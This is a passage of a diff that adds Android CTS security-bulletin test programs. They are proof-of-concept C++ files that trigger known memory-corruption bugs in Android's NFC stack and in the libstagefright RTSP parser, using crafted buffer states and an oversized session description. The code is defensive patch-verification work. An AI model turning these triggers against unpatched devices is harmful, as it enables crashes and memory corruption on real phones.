"poc.cpp", + ":cts_hostsidetests_securitybulletin_memutils", + ], + cflags: [ + "-DCHECK_OVERFLOW", + "-DENABLE_SELECTIVE_OVERLOADING", + ], + include_dirs: [ + "system/nfc/src/include/", + "system/nfc/src/gki/common/", + "system/nfc/src/gki/ulinux/", + "system/nfc/src/nfc/include/", + ], + shared_libs: [ + "libnfc-nci", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2019/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2019/poc.cpp new file mode 100644 index 00000000000..483b7c45c7a --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2019/poc.cpp @@ -0,0 +1,65 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <ce_int.h> +#include <nfc_int.h> + +#include "../includes/common.h" +#include "../includes/memutils.h" + +#define OFFSET 8 +#define VULNERABLE_LENGTH 0 + +char enable_selective_overload = ENABLE_NONE; + +extern tNFC_CB nfc_cb; +extern tCE_CB ce_cb; + +void GKI_freebuf(void* p_buf __attribute__((unused))) {} + +void nfc_start_quick_timer(TIMER_LIST_ENT*, uint16_t, uint32_t) {} + +void nfc_stop_timer(TIMER_LIST_ENT*) {} + +void nfc_stop_quick_timer(TIMER_LIST_ENT*) {} + +int main() { + enable_selective_overload = ENABLE_ALL; + GKI_init(); + ce_init(); + ce_cb.mem.t4t.status = CE_T4T_STATUS_REG_AID_SELECTED; + + if (ce_select_t4t() != NFC_STATUS_OK) { + return EXIT_FAILURE; + } + + tNFC_CONN_CB* p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID]; + tNFC_CONN* p_data = (tNFC_CONN*)malloc(sizeof(tNFC_CONN)); + p_data->data.p_data = (NFC_HDR*)malloc(sizeof(uint8_t) * 16); + NFC_HDR* p_c_apdu = (NFC_HDR*)p_data->data.p_data; + p_c_apdu->len = VULNERABLE_LENGTH; + p_c_apdu->offset = OFFSET; + uint8_t conn_id = 1; + TIMER_LIST_ENT pFirst = {}; + nfc_cb.quick_timer_queue.p_first = &pFirst; + + p_cb->p_cback(conn_id, NFC_DATA_CEVT, p_data); + + free(p_data->data.p_data); + free(p_data); + enable_selective_overload = ENABLE_NONE; + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2035/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2035/Android.bp new file mode 100644 index 00000000000..bd2504eeec2 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2035/Android.bp @@ -0,0 +1,38 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2019-2035", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ":cts_hostsidetests_securitybulletin_memutils", + ], + cflags: [ + "-DCHECK_OVERFLOW", + ], + compile_multilib: "64", + include_dirs: [ + "system/nfc/src/include", + "system/nfc/src/gki/common", + "system/nfc/src/nfc/include", + "system/nfc/src/gki/ulinux/", + ], + shared_libs: [ + "libnfc-nci", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2035/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2035/poc.cpp new file mode 100644 index 00000000000..a5dfb299c72 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2035/poc.cpp @@ -0,0 +1,111 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <stdlib.h> +#include <rw_int.h> +#include <nfc_int.h> + +extern tRW_CB rw_cb; +extern tNFC_CB nfc_cb; +void rw_init(void); +tNFC_STATUS rw_i93_select(uint8_t* p_uid); + +// borrowed from rw_i93.cc +enum { + RW_I93_STATE_NOT_ACTIVATED, /* ISO15693 is not activated */ + RW_I93_STATE_IDLE, /* waiting for upper layer API */ + RW_I93_STATE_BUSY, /* waiting for response from tag */ + + RW_I93_STATE_DETECT_NDEF, /* performing NDEF detection precedure */ + RW_I93_STATE_READ_NDEF, /* performing read NDEF procedure */ + RW_I93_STATE_UPDATE_NDEF, /* performing update NDEF procedure */ + RW_I93_STATE_FORMAT, /* performing format procedure */ + RW_I93_STATE_SET_READ_ONLY, /* performing set read-only procedure */ + + RW_I93_STATE_PRESENCE_CHECK /* checking presence of tag */ +}; + +// borrowed from rw_i93.cc +enum { + RW_I93_SUBSTATE_WAIT_UID, /* waiting for response of inventory */ + RW_I93_SUBSTATE_WAIT_SYS_INFO, /* waiting for response of get sys info */ + RW_I93_SUBSTATE_WAIT_CC, /* waiting for reading CC */ + RW_I93_SUBSTATE_SEARCH_NDEF_TLV, /* searching NDEF TLV */ + RW_I93_SUBSTATE_CHECK_LOCK_STATUS, /* check if any NDEF TLV is locked */ + + RW_I93_SUBSTATE_RESET_LEN, /* set length to 0 to update NDEF TLV */ + RW_I93_SUBSTATE_WRITE_NDEF, /* writing NDEF and Terminator TLV */ + RW_I93_SUBSTATE_UPDATE_LEN, /* set length into NDEF TLV */ + + RW_I93_SUBSTATE_WAIT_RESET_DSFID_AFI, /* reset DSFID and AFI */ + RW_I93_SUBSTATE_CHECK_READ_ONLY, /* check if any block is locked */ + RW_I93_SUBSTATE_WRITE_CC_NDEF_TLV, /* write CC and empty NDEF/Terminator TLV + */ + + RW_I93_SUBSTATE_WAIT_UPDATE_CC, /* updating CC as read-only */ + RW_I93_SUBSTATE_LOCK_NDEF_TLV, /* lock blocks of NDEF TLV */ + RW_I93_SUBSTATE_WAIT_LOCK_CC /* lock block of CC */ +}; + +void GKI_freebuf(void*) { +} + +void GKI_start_timer(uint8_t, int32_t, bool) { +} + +void GKI_stop_timer(uint8_t) { +} + +int main() { + tRW_I93_CB* p_i93 = &rw_cb.tcb.i93; + + GKI_init(); + rw_init(); + + uint8_t p_uid = 1; + if (rw_i93_select(&p_uid) != NFC_STATUS_OK) { + return EXIT_FAILURE; + } + + tNFC_CONN_CB* p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID]; + tNFC_CONN_EVT event = NFC_DATA_CEVT; + + tNFC_CONN *p_data = (tNFC_CONN *) malloc(sizeof(tNFC_CONN)); + if (!p_data) { + return EXIT_FAILURE; + } + + p_data->data.p_data = (NFC_HDR *) malloc(sizeof(uint8_t) * 32); + if (!(p_data->data.p_data)) { + free(p_data); + return EXIT_FAILURE; + } + + NFC_HDR *p_resp = (NFC_HDR*) p_data->data.p_data; + p_resp->len = 0; + p_resp->offset = 0; + + p_i93->state = RW_I93_STATE_UPDATE_NDEF; + p_i93->sub_state = RW_I93_SUBSTATE_RESET_LEN; + p_i93->block_size = 2 * (I93_MAX_BLOCK_LENGH + 1); + p_i93->ndef_tlv_start_offset = 2 * (I93_MAX_BLOCK_LENGH) - 1; + p_data->status = NFC_STATUS_OK; + + p_cb->p_cback(0, event, p_data); + free(p_data->data.p_data); + free(p_data); + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2040/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2040/Android.bp new file mode 100644 index 00000000000..942d552fd36 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2040/Android.bp @@ -0,0 +1,38 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2019-2040", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ":cts_hostsidetests_securitybulletin_memutils", + ], + cflags: [ + "-DCHECK_OVERFLOW", + ], + compile_multilib: "64", + include_dirs: [ + "system/nfc/src/include", + "system/nfc/src/gki/common", + "system/nfc/src/nfc/include", + "system/nfc/src/gki/ulinux/", + ], + shared_libs: [ + "libnfc-nci", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2040/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2040/poc.cpp new file mode 100644 index 00000000000..384c0859690 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2040/poc.cpp @@ -0,0 +1,112 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <nfc_api.h> +#include <nfc_int.h> +#include <rw_int.h> + +constexpr int kLength = 8; + +extern tRW_CB rw_cb; +extern tNFC_CB nfc_cb; +void rw_init(void); + +tNFC_STATUS rw_i93_select(uint8_t *p_uid); + +void GKI_start_timer(uint8_t, int32_t, bool) {} + +void GKI_stop_timer(uint8_t) {} + +// borrowed from rw_i93.cc +enum { + RW_I93_STATE_NOT_ACTIVATED, /* ISO15693 is not activated */ + RW_I93_STATE_IDLE, /* waiting for upper layer API */ + RW_I93_STATE_BUSY, /* waiting for response from tag */ + + RW_I93_STATE_DETECT_NDEF, /* performing NDEF detection precedure */ + RW_I93_STATE_READ_NDEF, /* performing read NDEF procedure */ + RW_I93_STATE_UPDATE_NDEF, /* performing update NDEF procedure */ + RW_I93_STATE_FORMAT, /* performing format procedure */ + RW_I93_STATE_SET_READ_ONLY, /* performing set read-only procedure */ + + RW_I93_STATE_PRESENCE_CHECK /* checking presence of tag */ +}; + +// borrowed from rw_i93.cc +enum { + RW_I93_SUBSTATE_WAIT_UID, /* waiting for response of inventory */ + RW_I93_SUBSTATE_WAIT_SYS_INFO, /* waiting for response of get sys info */ + RW_I93_SUBSTATE_WAIT_CC, /* waiting for reading CC */ + RW_I93_SUBSTATE_SEARCH_NDEF_TLV, /* searching NDEF TLV */ + RW_I93_SUBSTATE_CHECK_LOCK_STATUS, /* check if any NDEF TLV is locked */ + + RW_I93_SUBSTATE_RESET_LEN, /* set length to 0 to update NDEF TLV */ + RW_I93_SUBSTATE_WRITE_NDEF, /* writing NDEF and Terminator TLV */ + RW_I93_SUBSTATE_UPDATE_LEN, /* set length into NDEF TLV */ + + RW_I93_SUBSTATE_WAIT_RESET_DSFID_AFI, /* reset DSFID and AFI */ + RW_I93_SUBSTATE_CHECK_READ_ONLY, /* check if any block is locked */ + RW_I93_SUBSTATE_WRITE_CC_NDEF_TLV, /* write CC and empty NDEF/Terminator TLV + */ + + RW_I93_SUBSTATE_WAIT_UPDATE_CC, /* updating CC as read-only */ + RW_I93_SUBSTATE_LOCK_NDEF_TLV, /* lock blocks of NDEF TLV */ + RW_I93_SUBSTATE_WAIT_LOCK_CC /* lock block of CC */ +}; + +void GKI_freebuf(void *p_buf __attribute__((unused))) {} + +int main() { + tRW_I93_CB *p_i93 = &rw_cb.tcb.i93; + + GKI_init(); + rw_init(); + + uint8_t p_uid = 1; + if (rw_i93_select(&p_uid) != NFC_STATUS_OK) { + return EXIT_FAILURE; + } + + tNFC_CONN_CB *p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID]; + tNFC_CONN_EVT event = NFC_DATA_CEVT; + + tNFC_CONN *p_data = (tNFC_CONN *)malloc(sizeof(tNFC_CONN)); + if (!p_data) { + return EXIT_FAILURE; + } + + p_data->data.p_data = (NFC_HDR *)malloc(sizeof(uint8_t) * 16); + if (!(p_data->data.p_data)) { + free(p_data); + return EXIT_FAILURE; + } + + p_i93->state = RW_I93_STATE_BUSY; + p_i93->sub_state = RW_I93_SUBSTATE_CHECK_READ_ONLY; + p_i93->block_size = I93_MAX_BLOCK_LENGH - 1; + p_i93->sent_cmd = I93_CMD_EXT_GET_SYS_INFO; + p_data->status = NFC_STATUS_OK; + + NFC_HDR *p_resp = (NFC_HDR *)p_data->data.p_data; + p_resp->len = kLength; + p_resp->offset = 0; + + p_cb->p_cback(0, event, p_data); + free(p_data->data.p_data); + free(p_data); + + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2044/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2044/Android.bp new file mode 100644 index 00000000000..f516e6a6280 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2044/Android.bp @@ -0,0 +1,37 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2019-2044", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ":cts_hostsidetests_securitybulletin_memutils", + ], + cflags: [ + "-DCHECK_OVERFLOW", + ], + compile_multilib: "32", + include_dirs: [ + "frameworks/av/media/libstagefright/rtsp/", + ], + shared_libs: [ + "libmediaplayerservice", + "libstagefright_foundation", + "libutils", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2044/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2044/poc.cpp new file mode 100644 index 00000000000..e733c6f783c --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2044/poc.cpp @@ -0,0 +1,42 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +#include <stdlib.h> +#include <APacketSource.h> +#include <ASessionDescription.h> + +using namespace android; + +int main(void) { + sp<ASessionDescription> desc = new ASessionDescription; + static const char *raw = + "m=mFormats 20\r\n" + "a=rtpmap:20 MP4V-ES/1/2\r\n" + "a=fmtp:20 config=0000012000004000280020008061616161616161616161616161" + "61616161616161616161616161616161616161616161616161616161616161616161" + "61616161616161616161616161616161616161616161616161616161616161616161" + "616161616161616161616161616161616161616161616161616161\r\n" + "a=range:npt=1.1-2.2\r\n" + "a=framesize:1-9 \r\n" + "a=control:abc\r\n" + "a=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\r\n"; + + if(!desc->setTo(raw, strlen(raw))) { + return EXIT_FAILURE; + } + + sp<APacketSource> source = new APacketSource(desc, 1); + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2099/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2099/Android.bp new file mode 100644 index 00000000000..85304bc0f01 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2099/Android.bp @@ -0,0 +1,34 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ +cc_test { + name: "CVE-2019-2099", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ], + compile_multilib: "64", + include_dirs: [ + "system/nfc/src/nfc/include/", + "system/nfc/src/include/", + "system/nfc/src/gki/common/", + "system/nfc/src/gki/ulinux/", + "system/nfc/src/nfa/include/", + ], + shared_libs: [ + "libnfc-nci", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2099/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2099/poc.cpp new file mode 100644 index 00000000000..8cfa619138f --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2099/poc.cpp @@ -0,0 +1,122 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <dlfcn.h> +#include <nfa_rw_int.h> +#include <nfc_int.h> +#include <rw_int.h> +#include <stdlib.h> +#include "../includes/common.h" + +#define LENGTH 0xBEB + +extern tRW_CB rw_cb; +extern tNFC_CB nfc_cb; +void rw_init(void); +void NFA_Init(tHAL_NFC_ENTRY *p_hal_entry_tbl); +bool nfa_rw_activate_ntf(tNFA_RW_MSG *p_data); + +bool isInitialized = false; + +static void *(*real_memcpy)(void *to, const void *from, size_t numBytes) = nullptr; + +void init(void) { + real_memcpy = (void *(*)(void *, const void *, size_t))dlsym(RTLD_NEXT, "memcpy"); + if (real_memcpy == nullptr) { + return; + } + isInitialized = true; +} + +void *memcpy(void *to, const void *from, size_t numBytes) { + if (!isInitialized) { + init(); + } + if (numBytes == LENGTH) { + exit(EXIT_VULNERABLE); + } + return real_memcpy(to, from, numBytes); +} + +int freeResourcesAndReturn(int status, tNFA_RW_MSG *ptr1 = nullptr, + tNFC_ACTIVATE_DEVT *ptr2 = nullptr, tRW_DATA *ptr3 = nullptr, + NFC_HDR *ptr4 = nullptr, uint8_t *ptr5 = nullptr) { + if (ptr1) { + if (ptr2) { + free(ptr2); + } + free(ptr1); + } + if (ptr3) { + if (ptr4) { + free(ptr4); + } + free(ptr3); + } + if (ptr5) { + free(ptr5); + } + return status; +} + +int main() { + GKI_init(); + rw_init(); + tHAL_NFC_ENTRY p_hal_entry_tbl; + NFA_Init(&p_hal_entry_tbl); + + tNFA_RW_MSG *p_data = (tNFA_RW_MSG *)malloc(sizeof(tNFA_RW_MSG)); + if (!p_data) { + return EXIT_FAILURE; + } + p_data->activate_ntf.p_activate_params = + (tNFC_ACTIVATE_DEVT *)malloc(sizeof(tNFC_ACTIVATE_DEVT)); + if (!(p_data->activate_ntf.p_activate_params)) { + return freeResourcesAndReturn(EXIT_FAILURE, p_data); + } + + tNFC_ACTIVATE_DEVT *p_activate_params = p_data->activate_ntf.p_activate_params; + p_activate_params->protocol = NFC_PROTOCOL_T2T; + + nfa_rw_activate_ntf(p_data); + + tRW_CBACK *p_cback = rw_cb.p_cback; + tRW_DATA *p_rw_data = (tRW_DATA *)malloc(sizeof(tRW_DATA)); + if (!p_rw_data) { + return freeResourcesAndReturn(EXIT_FAILURE, p_data, p_data->activate_ntf.p_activate_params); + } + + nfa_rw_cb.cur_op = NFA_RW_OP_READ_NDEF; + p_rw_data->data.p_data = (NFC_HDR *)malloc(sizeof(NFC_HDR)); + if (!(p_rw_data->data.p_data)) { + return freeResourcesAndReturn(EXIT_FAILURE, p_data, p_data->activate_ntf.p_activate_params, + p_rw_data); + } + + nfa_rw_cb.p_ndef_buf = (uint8_t *)malloc(sizeof(uint8_t)); + if (!(nfa_rw_cb.p_ndef_buf)) { + return freeResourcesAndReturn(EXIT_FAILURE, p_data, p_data->activate_ntf.p_activate_params, + p_rw_data, p_rw_data->data.p_data); + } + + p_rw_data->data.p_data->len = LENGTH; + if (p_cback) { + p_cback(RW_T3T_CHECK_EVT, p_rw_data); + } + + return freeResourcesAndReturn(EXIT_SUCCESS, p_data, p_data->activate_ntf.p_activate_params, + p_rw_data, p_rw_data->data.p_data, nfa_rw_cb.p_ndef_buf); +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2133/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2133/Android.bp index a7eef920cbd..eb42b96323f 100644 --- a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2133/Android.bp +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2133/Android.bp @@ -22,9 +22,6 @@ cc_test { "poc.cpp", ], multilib: { - lib32: { - suffix: "32", - }, lib64: { include_dirs: [ "packages/apps/Nfc/nci/jni/extns/pn54x/src/mifare/", @@ -39,7 +36,6 @@ cc_test { shared_libs: [ "libnfc_nci_jni", ], - suffix: "64", }, }, } diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2134/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2134/Android.bp index 3bbda28f506..c8353feb305 100644 --- a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2134/Android.bp +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2134/Android.bp @@ -22,9 +22,6 @@ cc_test { "poc.cpp", ], multilib: { - lib32: { - suffix: "32", - }, lib64: { include_dirs: [ "packages/apps/Nfc/nci/jni/extns/pn54x/src/mifare/", @@ -39,7 +36,6 @@ cc_test { shared_libs: [ "libnfc_nci_jni", ], - suffix: "64", }, }, } diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2206/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2206/Android.bp new file mode 100644 index 00000000000..55a41e311ba --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2206/Android.bp @@ -0,0 +1,42 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2019-2206", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ":cts_hostsidetests_securitybulletin_memutils", + ], + compile_multilib: "64", + include_dirs: [ + "system/nfc/src/nfc/include/", + "system/nfc/src/include/", + "system/nfc/src/gki/common/", + "system/nfc/src/gki/ulinux/", + "system/nfc/src/nfa/include/", + ], + shared_libs: [ + "libnfc-nci", + "libchrome", + "libbase", + "liblog", + ], + cflags: [ + "-DCHECK_OVERFLOW", + ] +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2206/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2206/poc.cpp new file mode 100644 index 00000000000..f40a7f20c8a --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2206/poc.cpp @@ -0,0 +1,123 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <nfc_api.h> +#include <nfc_int.h> +#include <rw_int.h> +#include <stdlib.h> +#include <tags_defs.h> + +#define RWLENGTH 32 +#define PLENGTH 1 +#define OFFSET 7 + +// borrowed from rw_i93.cc +extern tRW_CB rw_cb; +extern tNFC_CB nfc_cb; +void rw_init(void); +tNFC_STATUS rw_i93_select(uint8_t *p_uid); + +// borrowed from rw_i93.cc +enum { + RW_I93_STATE_NOT_ACTIVATED, /* ISO15693 is not activated */ + RW_I93_STATE_IDLE, /* waiting for upper layer API */ + RW_I93_STATE_BUSY, /* waiting for response from tag */ + + RW_I93_STATE_DETECT_NDEF, /* performing NDEF detection precedure */ + RW_I93_STATE_READ_NDEF, /* performing read NDEF procedure */ + RW_I93_STATE_UPDATE_NDEF, /* performing update NDEF procedure */ + RW_I93_STATE_FORMAT, /* performing format procedure */ + RW_I93_STATE_SET_READ_ONLY, /* performing set read-only procedure */ + + RW_I93_STATE_PRESENCE_CHECK /* checking presence of tag */ +}; + +// borrowed from rw_i93.cc +enum { + RW_I93_SUBSTATE_WAIT_UID, /* waiting for response of inventory */ + RW_I93_SUBSTATE_WAIT_SYS_INFO, /* waiting for response of get sys info */ + RW_I93_SUBSTATE_WAIT_CC, /* waiting for reading CC */ + RW_I93_SUBSTATE_SEARCH_NDEF_TLV, /* searching NDEF TLV */ + RW_I93_SUBSTATE_CHECK_LOCK_STATUS, /* check if any NDEF TLV is locked */ + + RW_I93_SUBSTATE_RESET_LEN, /* set length to 0 to update NDEF TLV */ + RW_I93_SUBSTATE_WRITE_NDEF, /* writing NDEF and Terminator TLV */ + RW_I93_SUBSTATE_UPDATE_LEN, /* set length into NDEF TLV */ + + RW_I93_SUBSTATE_WAIT_RESET_DSFID_AFI, /* reset DSFID and AFI */ + RW_I93_SUBSTATE_CHECK_READ_ONLY, /* check if any block is locked */ + RW_I93_SUBSTATE_WRITE_CC_NDEF_TLV, /* write CC and empty NDEF/Terminator TLV + */ + + RW_I93_SUBSTATE_WAIT_UPDATE_CC, /* updating CC as read-only */ + RW_I93_SUBSTATE_LOCK_NDEF_TLV, /* lock blocks of NDEF TLV */ + RW_I93_SUBSTATE_WAIT_LOCK_CC /* lock block of CC */ +}; + +void GKI_freebuf(void *p_buf __attribute__((unused))) {} + +void GKI_start_timer(uint8_t, int32_t, bool) {} + +void GKI_stop_timer(uint8_t) {} + +int main() { + tRW_I93_CB *p_i93 = &rw_cb.tcb.i93; + + GKI_init(); + rw_init(); + + uint8_t p_uid = 1; + if (rw_i93_select(&p_uid) != NFC_STATUS_OK) { + return EXIT_FAILURE; + } + + tNFC_CONN_CB *p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID]; + tNFC_CONN_EVT event = NFC_DATA_CEVT; + + tNFC_CONN *p_data = (tNFC_CONN *)malloc(sizeof(tNFC_CONN)); + + if (!p_data) { + return EXIT_FAILURE; + } + + p_data->data.p_data = + (NFC_HDR *)malloc(sizeof(uint8_t) * (OFFSET + PLENGTH) * 2); + + if (!(p_data->data.p_data)) { + free(p_data); + return EXIT_FAILURE; + } + + p_i93->state = RW_I93_STATE_SET_READ_ONLY; + p_i93->sub_state = RW_I93_SUBSTATE_WAIT_CC; + p_i93->block_size = 1; + + p_i93->ndef_tlv_start_offset = 0; + p_i93->rw_length = RWLENGTH; + p_i93->ndef_length = p_i93->rw_length * 2; + + p_data->status = NFC_STATUS_OK; + NFC_HDR *p_resp = (NFC_HDR *)p_data->data.p_data; + p_resp->len = PLENGTH; + p_resp->offset = OFFSET; + + p_cb->p_cback(0, event, p_data); + + free(p_data->data.p_data); + free(p_data); + + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2207/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2207/Android.bp new file mode 100644 index 00000000000..114756431a4 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2207/Android.bp @@ -0,0 +1,39 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2019-2207", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ":cts_hostsidetests_securitybulletin_memutils", + ], + compile_multilib: "64", + include_dirs: [ + "system/nfc/src/nfc/include/", + "system/nfc/src/include/", + "system/nfc/src/gki/common/", + "system/nfc/src/gki/ulinux/", + 